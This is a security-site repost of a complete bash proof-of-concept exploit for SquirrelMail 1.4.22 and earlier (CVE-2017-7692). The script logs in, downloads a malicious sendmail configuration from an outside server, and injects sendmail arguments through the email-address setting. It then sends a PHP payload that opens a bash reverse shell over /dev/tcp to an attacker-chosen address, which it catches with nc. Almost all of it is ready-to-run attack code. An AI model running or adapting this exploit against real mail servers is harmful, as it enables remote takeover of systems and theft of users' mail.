首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 SquirrelMail < 1.4.22 - Remote Code Execution 来源：https://legalhackers.com 作者：Golunski 发布时间：2017-04-24   #!/bin/bash # int='\033[94m      __                     __   __  __           __                     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/            /____/                                                    SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)   SquirrelMail_RCE_exploit.sh (ver. 1.0)   Discovered and coded by   Dawid Golunski (@dawid_golunski) https://legalhackers.com   ExploitBox project: https://ExploitBox.io   \033[0m'   # Quick and messy PoC for SquirrelMail webmail application. # It contains payloads for 2 vectors: # * File Write # * RCE # It requires user credentials and that SquirrelMail uses # Sendmail method as email delivery transport # # # Full advisory URL: # https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html # Exploit URL: # https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh # # Tested on: # Ubuntu 16.04 # squirrelmail package version: # 2:1.4.23~svn20120406-2ubuntu1.16.04.1 # # Disclaimer: # For testing purposes only # # # ----------------------------------------------------------------- # # Interested in vulns/exploitation? # Stay tuned for my new project - ExploitBox # #                        .;lc'                          #                    .,cdkkOOOko;.                      #                 .,lxxkkkkOOOO000Ol'                   #             .':oxxxxxkkkkOOOO0000KK0x:'               #          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.           #       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.        #      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.       #     .ddc;,,:c;.         ,c:         .cxxc:;:ox:       #     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:       #     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:       #     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:       #     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:       #     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:       #     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:       #     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:       #     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:       #     .dxxxxxdl;. .,               .. .;cdxxxxxx:       #     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:       #      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.        #          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.            #             .':oxxxxxxxxx.ckkkkkkkkxl,.               #                 .,cdxxxxx.ckkkkkxc.                   #                    .':odx.ckxl,.                      #                        .,.'.      # # https://ExploitBox.io # # https://twitter.com/Exploit_Box # # -----------------------------------------------------------------   sqspool="/var/spool/squirrelmail/attach/"   echo -e "$int" #echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n" #echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n" #echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"     # Base URL if [ $# -ne 1 ]; then     echo -e "Usage: \n$0 SquirrelMail_URL"     echo -e "Example: \n$0 http://target/squirrelmail/ \n"          exit 2 fi URL="$1"   # Log in echo -e "\n[*] Enter SquirrelMail user credentials" read -p  "user: " squser read -sp "pass: " sqpass   echo -e "\n\n[*] Logging in to SquirrelMail at $URL" curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect if [ $? -eq 0 ]; then     echo "Invalid creds"     exit 2 fi sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"     # Prepare Sendmail cnf # # * The config will launch php via the following stanza: # # Mlocal,   P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, #       T=DNS/RFC822/X-Unix, #       A=php -- $u $h ${client_addr} # wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf   # Upload config echo -e "\n\n[*] Uploading Sendmail config" token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`" if [ ${#attachid} -lt 32 ]; then     echo "Something went wrong. Failed to upload the sendmail file."     exit 2 fi   # Create Sendmail cmd string according to selected payload echo -e "\n\n[?] Select payload\n" # SELECT PAYLOAD echo "1 - File write (into /tmp/sqpoc)" echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)" echo read -p "[1-2] " pchoice   case $pchoice in     1) payload="$squser@localhost   -oQ/tmp/    -X/tmp/sqpoc"        ;;       2) payload="$squser@localhost   -oQ/tmp/    -C$sqspool/$attachid"        ;; esac   if [ $pchoice -eq 2 ]; then     echo     read -p "Reverese shell IP: " reverse_ip     read -p "Reverese shell PORT: " reverse_port fi   # Reverse shell code phprevsh=" <?php     \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";     file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);     system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\"); ?>"     # Set sendmail params in user settings echo -e "\n[*] Injecting Sendmail command parameters" token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null if [ $? -ne 0 ]; then     echo "Failed to inject sendmail parameters"     exit 2 fi   # Send email which triggers the RCE vuln and runs phprevsh echo -e "\n[*] Sending the email to trigger the vuln" (sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \ -d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &   if [ $pchoice -eq 2 ]; then     echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"     nc -vv -l -p $reverse_port else     echo -e "\n[*] The test file should have been written at /tmp/sqpoc" fi   grep -q "302 Found" /tmp/sheaders if [ $? -eq 1 ]; then     echo "There was a problem with sending email"     exit 2 fi     # Done echo -e "\n[*] All done. Exiting"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·VirtualBox 5.1.14 r112924 - Un ·Easy MOV Converter 1.4.24 - Lo ·Microsoft Windows 10 10586 - I ·Gnome Keyring Daemon Credentia ·Apple WebKit / Safari 10.0.2(1 ·WePresent WiPG-1000 Command In ·Apple WebKit / Safari 10.0.2(1 ·Disk Sorter Enterprise 9.5.12 ·Microsoft Windows IFEO Winlogi ·Microsoft Office Word Maliciou ·Trend Micro Threat Discovery A ·PrivateTunnel Client 2.8 - Loc   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved